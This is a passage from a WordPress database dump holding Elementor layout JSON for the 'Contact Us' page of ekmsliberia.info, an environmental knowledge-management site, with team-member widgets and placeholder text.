Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14615,2319,'_elementor_edit_mode','builder'),(14616,2319,'_elementor_template_type','wp-page'),(14617,2319,'_elementor_version','2.7.5'),(14618,2319,'_wp_page_template','default'),(14619,2319,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2313,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"MEAs Officer\",\"member_description\":\"The Focal Point of the United Nations Convention on Biological Diversity\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#000000\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":\"\",\"url\":\"\"},\"member_first_name\":\"Berexford S\",\"member_last_name\":\"Jallah\",\"member_position\":\"GIS Supervisor\",\"member_description\":\"The Focal Point of the United Nations Convention to Combat Desertification\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14628,2321,'_elementor_edit_mode','builder'),(14629,2321,'_elementor_template_type','wp-page'),(14630,2321,'_elementor_version','2.7.5'),(14631,2321,'_wp_page_template','default'),(14632,2321,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",